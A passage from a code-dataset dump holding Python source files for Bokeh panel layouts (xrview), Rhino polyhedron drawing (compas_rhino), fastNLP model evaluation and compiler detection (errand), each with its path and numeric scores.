self._export(export_svgs, "svg", filename)
else:
raise ValueError("Unrecognized mode")
def make_doc(self):
""" Make the document. """
self.doc = Document()
self.doc.theme = self.theme
self.doc.add_root(row(self.layout))
def copy(self, with_data=False):
""" Create a copy of this instance.
Parameters
----------
with_data : bool, default False
If true, also copy the data.
Returns
-------
new : xrview.core.panel.BasePanel
The copied object.
"""
from copy import copy
new = self.__new__(type(self))
new.__dict__ = {
k: (copy(v) if (k != "data" or with_data) else v)
for k, v in self.__dict__.items()
}
return new
class GridPlot(BasePanel):
""" Base class for grid plots. """
def __init__(self, panels, ncols=1, toolbar_location="above"):
""" Constructor. """
self.panels = panels
self.ncols = ncols
self.toolbar_location = toolbar_location
self.make_layout()
def make_layout(self):
""" Make the layout. """
self.figures = []
for p in self.panels:
if p.layout is None:
p.make_layout()
# TODO: TEST
for c in p.layout.children:
if hasattr(c, "toolbar_location"):
c.toolbar_location = None
self.figures += p.figures
self.layout = gridplot(
[p.layout for p in self.panels],
ncols=self.ncols,
toolbar_location=self.toolbar_location,
)
return self.layout
class SpacerPanel(BasePanel):
""" Base class for spacers. """
def __init__(self):
""" Constructor. """
self.figures = [Spacer()]
self.make_layout()
def make_layout(self):
""" Make the layout. """
self.layout = column(*self.figures)
return self.layout | xrview/core/panel.py | import abc
from bokeh.document import Document
from bokeh.io import export_png, export_svgs
from bokeh.layouts import column, gridplot, row
from bokeh.models import Spacer
class BasePanel(object):
""" Base class for all panels. """
def __init__(self):
self.layout = None
self.doc = None
self.handlers = None
self.glyph_map = None
self.figure_map = None
self.figures = None
# TODO: improve
self.added_figures = []
self.added_overlays = []
self.added_overlay_figures = []
self.added_annotations = []
self.added_annotation_figures = []
self.modifiers = []
@abc.abstractmethod
def make_layout(self):
""" Make the layout. """
@abc.abstractmethod
def show(self, *args, **kwargs):
""" Show the layout. """
def _export(self, func, backend, filename):
""" Export. """
backends = []
for f in self.figures:
if hasattr(f, "output_backend"):
backends.append(f.output_backend)
f.output_backend = backend
func(self.layout, filename=filename)
for f in self.figures:
if hasattr(f, "output_backend"):
f.output_backend = backends.pop(0)
def export(self, filename, mode="auto"):
""" Export the layout as as png or svg file.
Parameters
----------
filename : str
The path of the exported file.
mode : 'auto', 'png' or 'svg', default 'auto'
Whether to export as png or svg. Note that multi-figure layouts
will be split into individual files for each figure in the svg
mode. 'auto' will try to determine the mode automatically from
the file extension.
"""
if self.layout is None:
self.make_layout()
if mode == "auto":
mode = filename.split(".")[-1]
if mode not in ("png", "svg"):
raise ValueError(
"Could not determine mode from file extension"
)
if mode == "png":
# TODO: TEST
for c in self.layout.children:
if hasattr(c, "toolbar_location"):
c.toolbar_location = None
self._export(export_png, "canvas", filename)
# TODO: TEST
for c in self.layout.children:
if hasattr(c, "toolbar_location"):
c.toolbar_location = self.toolbar_location
elif mode == "svg":
self._export(export_svgs, "svg", filename)
else:
raise ValueError("Unrecognized mode")
def make_doc(self):
""" Make the document. """
self.doc = Document()
self.doc.theme = self.theme
self.doc.add_root(row(self.layout))
def copy(self, with_data=False):
""" Create a copy of this instance.
Parameters
----------
with_data : bool, default False
If true, also copy the data.
Returns
-------
new : xrview.core.panel.BasePanel
The copied object.
"""
from copy import copy
new = self.__new__(type(self))
new.__dict__ = {
k: (copy(v) if (k != "data" or with_data) else v)
for k, v in self.__dict__.items()
}
return new
class GridPlot(BasePanel):
""" Base class for grid plots. """
def __init__(self, panels, ncols=1, toolbar_location="above"):
""" Constructor. """
self.panels = panels
self.ncols = ncols
self.toolbar_location = toolbar_location
self.make_layout()
def make_layout(self):
""" Make the layout. """
self.figures = []
for p in self.panels:
if p.layout is None:
p.make_layout()
# TODO: TEST
for c in p.layout.children:
if hasattr(c, "toolbar_location"):
c.toolbar_location = None
self.figures += p.figures
self.layout = gridplot(
[p.layout for p in self.panels],
ncols=self.ncols,
toolbar_location=self.toolbar_location,
)
return self.layout
class SpacerPanel(BasePanel):
""" Base class for spacers. """
def __init__(self):
""" Constructor. """
self.figures = [Spacer()]
self.make_layout()
def make_layout(self):
""" Make the layout. """
self.layout = column(*self.figures)
return self.layout | 0.457137 | 0.291397 |
from __future__ import print_function
from __future__ import absolute_import
from __future__ import division
import compas_rhino
from ._shapeartist import ShapeArtist
class PolyhedronArtist(ShapeArtist):
"""Artist for drawing polyhedron shapes.
Parameters
----------
shape : :class:`compas.geometry.Polyhedron`
A COMPAS polyhedron.
Notes
-----
See :class:`compas_rhino.artists.ShapeArtist` for all other parameters.
Examples
--------
.. code-block:: python
import random
from compas.geometry import Pointcloud
from compas.geometry import Polyhedron
from compas.geometry import Translation
from compas.utilities import i_to_rgb
import compas_rhino
from compas_rhino.artists import PolyhedronArtist
pcl = Pointcloud.from_bounds(10, 10, 10, 100)
tpl = Polyhedron.from_platonicsolid(12)
compas_rhino.clear_layer("Test::PolyhedronArtist")
for point in pcl.points:
polyhedron = tpl.transformed(Translation.from_vector(point))
artist = PolyhedronArtist(polyhedron, color=i_to_rgb(random.random()), layer="Test::PolyhedronArtist")
artist.draw()
"""
def draw(self, show_vertices=False, show_edges=False, show_faces=True, join_faces=True):
"""Draw the polyhedron associated with the artist.
Parameters
----------
show_vertices : bool, optional
Default is ``False``.
show_edges : bool, optional
Default is ``False``.
show_faces : bool, optional
Default is ``True``.
join_faces : bool, optional
Default is ``True``.
Returns
-------
list
The GUIDs of the objects created in Rhino.
"""
vertices = [list(vertex) for vertex in self.shape.vertices]
guids = []
if show_vertices:
points = [{'pos': point, 'color': self.color, 'name': str(index)} for index, point in enumerate(vertices)]
guids += compas_rhino.draw_points(points, layer=self.layer, clear=False, redraw=False)
if show_edges:
edges = self.shape.edges
lines = [{'start': vertices[i], 'end': vertices[j], 'color': self.color} for i, j in edges]
guids += compas_rhino.draw_lines(lines, layer=self.layer, clear=False, redraw=False)
if show_faces:
faces = self.shape.faces
if join_faces:
guid = compas_rhino.draw_mesh(vertices, faces, layer=self.layer, name=self.name, color=self.color, disjoint=True)
guids.append(guid)
else:
polygons = [{'points': [vertices[index] for index in face], 'color': self.color} for face in faces]
guids += compas_rhino.draw_faces(polygons, layer=self.layer, clear=False, redraw=False)
self._guids = guids
return guids
# ==============================================================================
# Main
# ==============================================================================
if __name__ == '__main__':
pass | src/compas_rhino/artists/polyhedronartist.py | from __future__ import print_function
from __future__ import absolute_import
from __future__ import division
import compas_rhino
from ._shapeartist import ShapeArtist
class PolyhedronArtist(ShapeArtist):
"""Artist for drawing polyhedron shapes.
Parameters
----------
shape : :class:`compas.geometry.Polyhedron`
A COMPAS polyhedron.
Notes
-----
See :class:`compas_rhino.artists.ShapeArtist` for all other parameters.
Examples
--------
.. code-block:: python
import random
from compas.geometry import Pointcloud
from compas.geometry import Polyhedron
from compas.geometry import Translation
from compas.utilities import i_to_rgb
import compas_rhino
from compas_rhino.artists import PolyhedronArtist
pcl = Pointcloud.from_bounds(10, 10, 10, 100)
tpl = Polyhedron.from_platonicsolid(12)
compas_rhino.clear_layer("Test::PolyhedronArtist")
for point in pcl.points:
polyhedron = tpl.transformed(Translation.from_vector(point))
artist = PolyhedronArtist(polyhedron, color=i_to_rgb(random.random()), layer="Test::PolyhedronArtist")
artist.draw()
"""
def draw(self, show_vertices=False, show_edges=False, show_faces=True, join_faces=True):
"""Draw the polyhedron associated with the artist.
Parameters
----------
show_vertices : bool, optional
Default is ``False``.
show_edges : bool, optional
Default is ``False``.
show_faces : bool, optional
Default is ``True``.
join_faces : bool, optional
Default is ``True``.
Returns
-------
list
The GUIDs of the objects created in Rhino.
"""
vertices = [list(vertex) for vertex in self.shape.vertices]
guids = []
if show_vertices:
points = [{'pos': point, 'color': self.color, 'name': str(index)} for index, point in enumerate(vertices)]
guids += compas_rhino.draw_points(points, layer=self.layer, clear=False, redraw=False)
if show_edges:
edges = self.shape.edges
lines = [{'start': vertices[i], 'end': vertices[j], 'color': self.color} for i, j in edges]
guids += compas_rhino.draw_lines(lines, layer=self.layer, clear=False, redraw=False)
if show_faces:
faces = self.shape.faces
if join_faces:
guid = compas_rhino.draw_mesh(vertices, faces, layer=self.layer, name=self.name, color=self.color, disjoint=True)
guids.append(guid)
else:
polygons = [{'points': [vertices[index] for index in face], 'color': self.color} for face in faces]
guids += compas_rhino.draw_faces(polygons, layer=self.layer, clear=False, redraw=False)
self._guids = guids
return guids
# ==============================================================================
# Main
# ==============================================================================
if __name__ == '__main__':
pass | 0.898711 | 0.38549 |
import torch
from torch import nn
from fastNLP.core.batch import Batch
from fastNLP.core.dataset import DataSet
from fastNLP.core.metrics import _prepare_metrics
from fastNLP.core.sampler import SequentialSampler
from fastNLP.core.utils import CheckError
from fastNLP.core.utils import _build_args
from fastNLP.core.utils import _check_loss_evaluate
from fastNLP.core.utils import _move_dict_value_to_device
from fastNLP.core.utils import get_func_signature
class Tester(object):
"""An collection of model inference and evaluation of performance, used over validation/dev set and test set.
:param DataSet data: a validation/development set
:param torch.nn.modules.module model: a PyTorch model
:param MetricBase metrics: a metric object or a list of metrics (List[MetricBase])
:param int batch_size: batch size for validation
:param bool use_cuda: whether to use CUDA in validation.
:param int verbose: the number of steps after which an information is printed.
"""
def __init__(self, data, model, metrics, batch_size=16, use_cuda=False, verbose=1):
super(Tester, self).__init__()
if not isinstance(data, DataSet):
raise TypeError(f"The type of data must be `fastNLP.DataSet`, got `{type(data)}`.")
if not isinstance(model, nn.Module):
raise TypeError(f"The type of model must be `torch.nn.Module`, got `{type(model)}`.")
self.metrics = _prepare_metrics(metrics)
self.data = data
self.use_cuda = use_cuda
self.batch_size = batch_size
self.verbose = verbose
if torch.cuda.is_available() and self.use_cuda:
self._model = model.cuda()
else:
self._model = model
self._model_device = model.parameters().__next__().device
# check predict
if hasattr(self._model, 'predict'):
self._predict_func = self._model.predict
if not callable(self._predict_func):
_model_name = model.__class__.__name__
raise TypeError(f"`{_model_name}.predict` must be callable to be used "
f"for evaluation, not `{type(self._predict_func)}`.")
else:
self._predict_func = self._model.forward
def test(self):
"""Start test or validation.
:return eval_results: a dictionary whose keys are the class name of metrics to use, values are the evaluation results of these metrics.
"""
# turn on the testing mode; clean up the history
network = self._model
self._mode(network, is_test=True)
data_iterator = Batch(self.data, self.batch_size, sampler=SequentialSampler(), as_numpy=False)
eval_results = {}
try:
with torch.no_grad():
for batch_x, batch_y in data_iterator:
_move_dict_value_to_device(batch_x, batch_y, device=self._model_device)
pred_dict = self._data_forward(self._predict_func, batch_x)
if not isinstance(pred_dict, dict):
raise TypeError(f"The return value of {get_func_signature(self._predict_func)} "
f"must be `dict`, got {type(pred_dict)}.")
for metric in self.metrics:
metric(pred_dict, batch_y)
for metric in self.metrics:
eval_result = metric.get_metric()
if not isinstance(eval_result, dict):
raise TypeError(f"The return value of {get_func_signature(metric.get_metric)} must be "
f"`dict`, got {type(eval_result)}")
metric_name = metric.__class__.__name__
eval_results[metric_name] = eval_result
except CheckError as e:
prev_func_signature = get_func_signature(self._predict_func)
_check_loss_evaluate(prev_func_signature=prev_func_signature, func_signature=e.func_signature,
check_res=e.check_res, pred_dict=pred_dict, target_dict=batch_y,
dataset=self.data, check_level=0)
if self.verbose >= 1:
print("[tester] \n{}".format(self._format_eval_results(eval_results)))
self._mode(network, is_test=False)
return eval_results
def _mode(self, model, is_test=False):
"""Train mode or Test mode. This is for PyTorch currently.
:param model: a PyTorch model
:param is_test: bool, whether in test mode or not.
"""
if is_test:
model.eval()
else:
model.train()
def _data_forward(self, func, x):
"""A forward pass of the model. """
x = _build_args(func, **x)
y = func(**x)
return y
def _format_eval_results(self, results):
"""Override this method to support more print formats.
:param results: dict, (str: float) is (metrics name: value)
"""
_str = ''
for metric_name, metric_result in results.items():
_str += metric_name + ': '
_str += ", ".join([str(key) + "=" + str(value) for key, value in metric_result.items()])
_str += '\n'
return _str[:-1] | fastNLP/core/tester.py | import torch
from torch import nn
from fastNLP.core.batch import Batch
from fastNLP.core.dataset import DataSet
from fastNLP.core.metrics import _prepare_metrics
from fastNLP.core.sampler import SequentialSampler
from fastNLP.core.utils import CheckError
from fastNLP.core.utils import _build_args
from fastNLP.core.utils import _check_loss_evaluate
from fastNLP.core.utils import _move_dict_value_to_device
from fastNLP.core.utils import get_func_signature
class Tester(object):
"""An collection of model inference and evaluation of performance, used over validation/dev set and test set.
:param DataSet data: a validation/development set
:param torch.nn.modules.module model: a PyTorch model
:param MetricBase metrics: a metric object or a list of metrics (List[MetricBase])
:param int batch_size: batch size for validation
:param bool use_cuda: whether to use CUDA in validation.
:param int verbose: the number of steps after which an information is printed.
"""
def __init__(self, data, model, metrics, batch_size=16, use_cuda=False, verbose=1):
super(Tester, self).__init__()
if not isinstance(data, DataSet):
raise TypeError(f"The type of data must be `fastNLP.DataSet`, got `{type(data)}`.")
if not isinstance(model, nn.Module):
raise TypeError(f"The type of model must be `torch.nn.Module`, got `{type(model)}`.")
self.metrics = _prepare_metrics(metrics)
self.data = data
self.use_cuda = use_cuda
self.batch_size = batch_size
self.verbose = verbose
if torch.cuda.is_available() and self.use_cuda:
self._model = model.cuda()
else:
self._model = model
self._model_device = model.parameters().__next__().device
# check predict
if hasattr(self._model, 'predict'):
self._predict_func = self._model.predict
if not callable(self._predict_func):
_model_name = model.__class__.__name__
raise TypeError(f"`{_model_name}.predict` must be callable to be used "
f"for evaluation, not `{type(self._predict_func)}`.")
else:
self._predict_func = self._model.forward
def test(self):
"""Start test or validation.
:return eval_results: a dictionary whose keys are the class name of metrics to use, values are the evaluation results of these metrics.
"""
# turn on the testing mode; clean up the history
network = self._model
self._mode(network, is_test=True)
data_iterator = Batch(self.data, self.batch_size, sampler=SequentialSampler(), as_numpy=False)
eval_results = {}
try:
with torch.no_grad():
for batch_x, batch_y in data_iterator:
_move_dict_value_to_device(batch_x, batch_y, device=self._model_device)
pred_dict = self._data_forward(self._predict_func, batch_x)
if not isinstance(pred_dict, dict):
raise TypeError(f"The return value of {get_func_signature(self._predict_func)} "
f"must be `dict`, got {type(pred_dict)}.")
for metric in self.metrics:
metric(pred_dict, batch_y)
for metric in self.metrics:
eval_result = metric.get_metric()
if not isinstance(eval_result, dict):
raise TypeError(f"The return value of {get_func_signature(metric.get_metric)} must be "
f"`dict`, got {type(eval_result)}")
metric_name = metric.__class__.__name__
eval_results[metric_name] = eval_result
except CheckError as e:
prev_func_signature = get_func_signature(self._predict_func)
_check_loss_evaluate(prev_func_signature=prev_func_signature, func_signature=e.func_signature,
check_res=e.check_res, pred_dict=pred_dict, target_dict=batch_y,
dataset=self.data, check_level=0)
if self.verbose >= 1:
print("[tester] \n{}".format(self._format_eval_results(eval_results)))
self._mode(network, is_test=False)
return eval_results
def _mode(self, model, is_test=False):
"""Train mode or Test mode. This is for PyTorch currently.
:param model: a PyTorch model
:param is_test: bool, whether in test mode or not.
"""
if is_test:
model.eval()
else:
model.train()
def _data_forward(self, func, x):
"""A forward pass of the model. """
x = _build_args(func, **x)
y = func(**x)
return y
def _format_eval_results(self, results):
"""Override this method to support more print formats.
:param results: dict, (str: float) is (metrics name: value)
"""
_str = ''
for metric_name, metric_result in results.items():
_str += metric_name + ': '
_str += ", ".join([str(key) + "=" + str(value) for key, value in metric_result.items()])
_str += '\n'
return _str[:-1] | 0.929015 | 0.394114 |
import os, sys, abc, re
from errand.util import which, shellcmd
class Compiler(abc.ABC):
"""Parent class for all compiler classes
"""
def __init__(self, path, flags):
self.path = path
self.flags = flags
self.version = None
def isavail(self):
if self.version is None:
self.set_version(self.get_version())
return (self.path is not None and os.path.isfile(self.path) and
self.version is not None)
def set_version(self, version):
if version and self.check_version(version):
self.version = version
@abc.abstractmethod
def get_option(self, **kwargs):
linker = kwargs.pop("linker", True)
opt = " ".join(self.flags) if self.flags else ""
if linker is False:
opt += " -c "
return opt
def get_version(self):
ver = shellcmd("%s --version" % self.path).stdout.decode()
return ver.strip() if ver else None
@abc.abstractmethod
def check_version(self, version):
return False
class Cpp_Compiler(Compiler):
def __init__(self, path, flags):
super(Cpp_Compiler, self).__init__(path, flags)
class Fortran_Compiler(Compiler):
def __init__(self, path, flags):
super(Fortran_Compiler, self).__init__(path, flags)
def get_option(self, **kwargs):
opt = " "
moddir = kwargs.pop("moddir", None)
if moddir:
opt = "-J %s " % moddir
return opt + super(Fortran_Compiler, self).get_option(**kwargs)
class AppleClang_Cpp_Compiler(Cpp_Compiler):
libext = "dylib"
def __init__(self, path, flags):
if path is None:
path = which("clang++")
super(AppleClang_Cpp_Compiler, self).__init__(path, flags)
def get_option(self, **kwargs):
return "-dynamiclib -fPIC " + super(AppleClang_Cpp_Compiler, self).get_option(**kwargs)
def check_version(self, version):
return version.startswith("Apple clang version")
class Gnu_Cpp_Compiler(Cpp_Compiler):
def __init__(self, path, flags):
if path is None:
path = which("g++")
super(Gnu_Cpp_Compiler, self).__init__(path, flags)
def get_option(self, **kwargs):
return "-shared -fPIC " + super(Gnu_Cpp_Compiler, self).get_option(**kwargs)
def check_version(self, version):
return version.startswith("g++ (GCC)")
class AmdClang_Cpp_Compiler(Cpp_Compiler):
def __init__(self, path, flags):
if path is None:
path = which("clang")
super(AmdClang_Cpp_Compiler, self).__init__(path, flags)
def get_option(self, **kwargs):
return "-shared " + super(AmdClang_Cpp_Compiler, self).get_option(**kwargs)
def check_version(self, version):
return version.startswith("clang version") and "roc" in version
class Pgi_Cpp_Compiler(Cpp_Compiler):
def __init__(self, path, flags):
if path is None:
path = which("pgc++")
super(Pgi_Cpp_Compiler, self).__init__(path, flags)
def get_option(self, **kwargs):
return "-shared " + super(Pgi_Cpp_Compiler, self).get_option(**kwargs)
def check_version(self, version):
return version.startswith("pgc++") and "PGI" in version
class CrayClang_Cpp_Compiler(Cpp_Compiler):
def __init__(self, path, flags):
if path is None:
path = which("CC")
if path is None:
path = which("clang++")
if path is None:
path = which("crayCC")
super(CrayClang_Cpp_Compiler, self).__init__(path, flags)
def get_option(self, **kwargs):
return "-shared " + super(CrayClang_Cpp_Compiler, self).get_option(**kwargs)
def check_version(self, version):
return version.startswith("Cray clang version")
class IbmXl_Cpp_Compiler(Cpp_Compiler):
def __init__(self, path, flags):
if path is None:
path = which("xlc++")
super(IbmXl_Cpp_Compiler, self).__init__(path, flags)
def get_option(self, **kwargs):
return "-shared " + super(IbmXl_Cpp_Compiler, self).get_option(**kwargs)
def check_version(self, version):
return version.startswith("IBM XL C/C++")
class Pthread_Gnu_Cpp_Compiler(Gnu_Cpp_Compiler):
def get_option(self, **kwargs):
return "-pthread " + super(Pthread_Gnu_Cpp_Compiler, self).get_option(**kwargs)
class Pthread_CrayClang_Cpp_Compiler(CrayClang_Cpp_Compiler):
def get_option(self, **kwargs):
return "-pthread " + super(Pthread_CrayClang_Cpp_Compiler, self).get_option(**kwargs)
class Pthread_AmdClang_Cpp_Compiler(AmdClang_Cpp_Compiler):
def get_option(self, **kwargs):
return "-pthread " + super(Pthread_AmdClang_Cpp_Compiler, self).get_option(**kwargs)
class Pthread_Pgi_Cpp_Compiler(Pgi_Cpp_Compiler):
def get_option(self, **kwargs):
return "-lpthread " + super(Pthread_Pgi_Cpp_Compiler, self).get_option(**kwargs)
class Pthread_AppleClang_Cpp_Compiler(AppleClang_Cpp_Compiler):
def get_option(self, **kwargs):
return "-lpthread " + super(Pthread_AppleClang_Cpp_Compiler,
self).get_option(**kwargs)
class OpenAcc_Gnu_Cpp_Compiler(Pthread_Gnu_Cpp_Compiler):
def __init__(self, path, flags):
super(OpenAcc_Gnu_Cpp_Compiler, self).__init__(path, flags)
def get_option(self, **kwargs):
return ("-fopenacc " +
super(OpenAcc_Gnu_Cpp_Compiler, self).get_option(**kwargs))
def check_version(self, version):
pat = re.compile(r"(?P<major>\d+)\.(?P<minor>\d+)\.(?P<patch>\d)+")
match = pat.search(version)
if not match:
return False
return int(match.group("major")) >= 10
class OpenAcc_CrayClang_Cpp_Compiler(Pthread_CrayClang_Cpp_Compiler):
def __init__(self, path, flags):
super(OpenAcc_CrayClang_Cpp_Compiler, self).__init__(path, flags)
def get_option(self, **kwargs):
return ("-h pragma=acc " +
super(OpenAcc_CrayClang_Cpp_Compiler, self).get_option(**kwargs))
class OpenAcc_Pgi_Cpp_Compiler(Pthread_Pgi_Cpp_Compiler):
def __init__(self, path, flags):
super(OpenAcc_Pgi_Cpp_Compiler, self).__init__(path, flags)
def get_option(self, **kwargs):
return ("-acc " +
super(OpenAcc_Pgi_Cpp_Compiler, self).get_option(**kwargs))
class Cuda_Cpp_Compiler(Cpp_Compiler):
def __init__(self, path, flags):
if path is None:
path = which("nvcc")
super(Cuda_Cpp_Compiler, self).__init__(path, flags)
def get_option(self, **kwargs):
return ("--compiler-options '-fPIC' --shared " +
super(Cuda_Cpp_Compiler, self).get_option(**kwargs))
def check_version(self, version):
return version.startswith("nvcc: NVIDIA")
class Hip_Cpp_Compiler(Cpp_Compiler):
def __init__(self, path, flags):
if path is None:
path = which("hipcc")
super(Hip_Cpp_Compiler, self).__init__(path, flags)
def get_option(self, **kwargs):
return ("-fPIC --shared " +
super(Hip_Cpp_Compiler, self).get_option(**kwargs))
def check_version(self, version):
return version.startswith("HIP version")
class Gnu_Fortran_Compiler(Fortran_Compiler):
def __init__(self, path, flags):
if path is None:
path = which("gfortran")
super(Gnu_Fortran_Compiler, self).__init__(path, flags)
def get_option(self, **kwargs):
opt = " "
return "-shared -fPIC " + opt + super(Gnu_Fortran_Compiler,
self).get_option(**kwargs)
def check_version(self, version):
return version.startswith("GNU Fortran")
class AmdFlang_Fortran_Compiler(Fortran_Compiler):
def __init__(self, path, flags):
if path is None:
path = which("flang")
super(AmdFlang_Fortran_Compiler, self).__init__(path, flags)
def get_option(self, **kwargs):
opt = " "
return "-shared " + opt + super(AmdFlang_Fortran_Compiler,
self).get_option(**kwargs)
def check_version(self, version):
return version.startswith("flang-new version") and "roc" in version
class Cray_Fortran_Compiler(Fortran_Compiler):
def __init__(self, path, flags):
if path is None:
path = which("ftn")
if path is None:
path = which("crayftn")
super(Cray_Fortran_Compiler, self).__init__(path, flags)
def get_option(self, **kwargs):
opt = " "
return "-shared " + opt + super(Cray_Fortran_Compiler,
self).get_option(**kwargs)
def check_version(self, version):
return version.startswith("Cray Fortran")
class AppleGnu_Fortran_Compiler(Gnu_Fortran_Compiler):
libext = "dylib"
def check_version(self, version):
return sys.platform == "darwin" and super(AppleGnu_Fortran_Compiler,
self).check_version(version)
class IbmXl_Fortran_Compiler(Fortran_Compiler):
def __init__(self, path, flags):
if path is None:
path = which("xlf2008_r")
if path is None:
path = which("xlf2008")
if path is None:
path = which("xlf2003_r")
if path is None:
path = which("xlf2003")
if path is None:
path = which("xlf95_r")
if path is None:
path = which("xlf95")
if path is None:
path = which("xlf90_r")
if path is None:
path = which("xlf90")
super(IbmXl_Fortran_Compiler, self).__init__(path, flags)
def get_version(self):
ver = shellcmd("%s -qversion" % self.path).stdout.decode()
return ver.strip() if ver else None
def get_option(self, **kwargs):
opt = " "
moddir = kwargs.pop("moddir", None)
if moddir:
opt = "-qmoddir=%s " % moddir
return "-qmkshrobj " + opt + super(IbmXl_Fortran_Compiler,
self).get_option(**kwargs)
def check_version(self, version):
return version.startswith("IBM XL Fortran")
class Pgi_Fortran_Compiler(Fortran_Compiler):
def __init__(self, path, flags):
if path is None:
path = which("pgfortran")
super(Pgi_Fortran_Compiler, self).__init__(path, flags)
def get_option(self, **kwargs):
opt = " "
moddir = kwargs.pop("moddir", None)
if moddir:
opt = "-module %s " % moddir
return "-shared -fpic " + opt + super(Pgi_Fortran_Compiler, self).get_option(**kwargs)
def check_version(self, version):
return version.startswith("pgfortran") and "PGI" in version
class Compilers(object):
def __init__(self, backend, compile):
self.clist = []
clist = []
if backend in ("pthread", "c++"):
clist = [Pthread_Gnu_Cpp_Compiler, Pthread_CrayClang_Cpp_Compiler,
Pthread_AmdClang_Cpp_Compiler, Pthread_Pgi_Cpp_Compiler,
Pthread_AppleClang_Cpp_Compiler]
elif backend == "cuda":
clist = [Cuda_Cpp_Compiler]
elif backend == "hip":
clist = [Hip_Cpp_Compiler]
elif backend == "openacc-c++":
clist = [OpenAcc_Gnu_Cpp_Compiler, OpenAcc_CrayClang_Cpp_Compiler,
OpenAcc_Pgi_Cpp_Compiler]
elif backend == "fortran":
clist = [AmdFlang_Fortran_Compiler, Cray_Fortran_Compiler,
Pgi_Fortran_Compiler, IbmXl_Fortran_Compiler,
AppleGnu_Fortran_Compiler, Gnu_Fortran_Compiler]
else:
raise Exception("Compiler for '%s' is not supported." % backend)
for cls in clist:
try:
if compile:
path = which(compile[0])
if path:
self.clist.append(cls(path, compile[1:]))
else:
self.clist.append(cls(None, None))
except Exception as err:
pass
def isavail(self):
return self.select_one() is not None
def select_one(self):
for comp in self.clist:
if comp.isavail():
return comp
def select_many(self):
comps = []
for comp in self.clist:
if comp.isavail():
comps.append(comp)
return comps | errand/compiler.py | import os, sys, abc, re
from errand.util import which, shellcmd
class Compiler(abc.ABC):
"""Parent class for all compiler classes
"""
def __init__(self, path, flags):
self.path = path
self.flags = flags
self.version = None
def isavail(self):
if self.version is None:
self.set_version(self.get_version())
return (self.path is not None and os.path.isfile(self.path) and
self.version is not None)
def set_version(self, version):
if version and self.check_version(version):
self.version = version
@abc.abstractmethod
def get_option(self, **kwargs):
linker = kwargs.pop("linker", True)
opt = " ".join(self.flags) if self.flags else ""
if linker is False:
opt += " -c "
return opt
def get_version(self):
ver = shellcmd("%s --version" % self.path).stdout.decode()
return ver.strip() if ver else None
@abc.abstractmethod
def check_version(self, version):
return False
class Cpp_Compiler(Compiler):
def __init__(self, path, flags):
super(Cpp_Compiler, self).__init__(path, flags)
class Fortran_Compiler(Compiler):
def __init__(self, path, flags):
super(Fortran_Compiler, self).__init__(path, flags)
def get_option(self, **kwargs):
opt = " "
moddir = kwargs.pop("moddir", None)
if moddir:
opt = "-J %s " % moddir
return opt + super(Fortran_Compiler, self).get_option(**kwargs)
class AppleClang_Cpp_Compiler(Cpp_Compiler):
libext = "dylib"
def __init__(self, path, flags):
if path is None:
path = which("clang++")
super(AppleClang_Cpp_Compiler, self).__init__(path, flags)
def get_option(self, **kwargs):
return "-dynamiclib -fPIC " + super(AppleClang_Cpp_Compiler, self).get_option(**kwargs)
def check_version(self, version):
return version.startswith("Apple clang version")
class Gnu_Cpp_Compiler(Cpp_Compiler):
def __init__(self, path, flags):
if path is None:
path = which("g++")
super(Gnu_Cpp_Compiler, self).__init__(path, flags)
def get_option(self, **kwargs):
return "-shared -fPIC " + super(Gnu_Cpp_Compiler, self).get_option(**kwargs)
def check_version(self, version):
return version.startswith("g++ (GCC)")
class AmdClang_Cpp_Compiler(Cpp_Compiler):
def __init__(self, path, flags):
if path is None:
path = which("clang")
super(AmdClang_Cpp_Compiler, self).__init__(path, flags)
def get_option(self, **kwargs):
return "-shared " + super(AmdClang_Cpp_Compiler, self).get_option(**kwargs)
def check_version(self, version):
return version.startswith("clang version") and "roc" in version
class Pgi_Cpp_Compiler(Cpp_Compiler):
def __init__(self, path, flags):
if path is None:
path = which("pgc++")
super(Pgi_Cpp_Compiler, self).__init__(path, flags)
def get_option(self, **kwargs):
return "-shared " + super(Pgi_Cpp_Compiler, self).get_option(**kwargs)
def check_version(self, version):
return version.startswith("pgc++") and "PGI" in version
class CrayClang_Cpp_Compiler(Cpp_Compiler):
def __init__(self, path, flags):
if path is None:
path = which("CC")
if path is None:
path = which("clang++")
if path is None:
path = which("crayCC")
super(CrayClang_Cpp_Compiler, self).__init__(path, flags)
def get_option(self, **kwargs):
return "-shared " + super(CrayClang_Cpp_Compiler, self).get_option(**kwargs)
def check_version(self, version):
return version.startswith("Cray clang version")
class IbmXl_Cpp_Compiler(Cpp_Compiler):
def __init__(self, path, flags):
if path is None:
path = which("xlc++")
super(IbmXl_Cpp_Compiler, self).__init__(path, flags)
def get_option(self, **kwargs):
return "-shared " + super(IbmXl_Cpp_Compiler, self).get_option(**kwargs)
def check_version(self, version):
return version.startswith("IBM XL C/C++")
class Pthread_Gnu_Cpp_Compiler(Gnu_Cpp_Compiler):
def get_option(self, **kwargs):
return "-pthread " + super(Pthread_Gnu_Cpp_Compiler, self).get_option(**kwargs)
class Pthread_CrayClang_Cpp_Compiler(CrayClang_Cpp_Compiler):
def get_option(self, **kwargs):
return "-pthread " + super(Pthread_CrayClang_Cpp_Compiler, self).get_option(**kwargs)
class Pthread_AmdClang_Cpp_Compiler(AmdClang_Cpp_Compiler):
def get_option(self, **kwargs):
return "-pthread " + super(Pthread_AmdClang_Cpp_Compiler, self).get_option(**kwargs)
class Pthread_Pgi_Cpp_Compiler(Pgi_Cpp_Compiler):
def get_option(self, **kwargs):
return "-lpthread " + super(Pthread_Pgi_Cpp_Compiler, self).get_option(**kwargs)
class Pthread_AppleClang_Cpp_Compiler(AppleClang_Cpp_Compiler):
def get_option(self, **kwargs):
return "-lpthread " + super(Pthread_AppleClang_Cpp_Compiler,
self).get_option(**kwargs)
class OpenAcc_Gnu_Cpp_Compiler(Pthread_Gnu_Cpp_Compiler):
def __init__(self, path, flags):
super(OpenAcc_Gnu_Cpp_Compiler, self).__init__(path, flags)
def get_option(self, **kwargs):
return ("-fopenacc " +
super(OpenAcc_Gnu_Cpp_Compiler, self).get_option(**kwargs))
def check_version(self, version):
pat = re.compile(r"(?P<major>\d+)\.(?P<minor>\d+)\.(?P<patch>\d)+")
match = pat.search(version)
if not match:
return False
return int(match.group("major")) >= 10
class OpenAcc_CrayClang_Cpp_Compiler(Pthread_CrayClang_Cpp_Compiler):
def __init__(self, path, flags):
super(OpenAcc_CrayClang_Cpp_Compiler, self).__init__(path, flags)
def get_option(self, **kwargs):
return ("-h pragma=acc " +
super(OpenAcc_CrayClang_Cpp_Compiler, self).get_option(**kwargs))
